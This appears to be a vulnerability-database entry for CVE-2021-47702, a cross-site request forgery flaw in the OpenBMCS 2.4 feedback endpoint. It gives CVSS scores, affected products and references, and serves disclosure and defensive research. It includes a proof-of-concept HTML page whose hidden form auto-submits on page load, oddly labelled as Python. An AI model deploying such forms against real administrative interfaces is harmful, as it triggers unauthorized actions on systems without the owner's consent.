Security Vulnerability Report
中文
CVE-2021-47702 CVSS 4.3 MEDIUM

CVE-2021-47702

Published: 2025-12-09 21:15:49
Last Modified: 2025-12-19 19:40:25
Source: [email protected]

Description

OpenBMCS 2.4 contains a CSRF vulnerability that allows attackers to perform actions with administrative privileges by exploiting the sendFeedback.php endpoint. Attackers can submit malicious requests to trigger unintended actions, such as sending emails or modifying system settings.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openbmcs:openbmcs:2.4:*:*:*:*:*:*:* - VULNERABLE
OpenBMCS 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2021-47702 - OpenBMCS 2.4 sendFeedback.php --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2021-47702</title> </head> <body> <h1>CSRF PoC for OpenBMCS 2.4</h1> <p>This PoC demonstrates the CSRF vulnerability in sendFeedback.php</p> <!-- Auto-submit form to trigger malicious feedback submission --> <form id="csrfForm" action="http://target-openbmcs/sendFeedback.php" method="POST" style="display:none;"> <input type="hidden" name="feedback_subject" value="System Alert"> <input type="hidden" name="feedback_message" value="Malicious feedback content injected by attacker"> <input type="hidden" name="feedback_email" value="[email protected]"> <input type="hidden" name="submit" value="Submit"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack may have failed.</p> </body> </html> <!-- Alternative: Image tag-based GET request (if endpoint supports GET) --> <!-- <img src="http://target-openbmcs/sendFeedback.php?subject=Malicious&message=CSRF" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47702", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:48.890", "lastModified": "2025-12-19T19:40:24.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBMCS 2.4 contains a CSRF vulnerability that allows attackers to perform actions with administrative privileges by exploiting the sendFeedback.php endpoint. Attackers can submit malicious requests to trigger unintended actions, such as sending emails or modifying system settings."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbmcs:openbmcs:2.4:*:*:*:*:*:*:*", "matchCriteriaId": "E3963F28-1F3E-488E-A815-FA0BD370105D"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50667", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.openbmcs.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/openbmcs-cross-site-request-forgery-csrf-via-sendfeedbackphp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.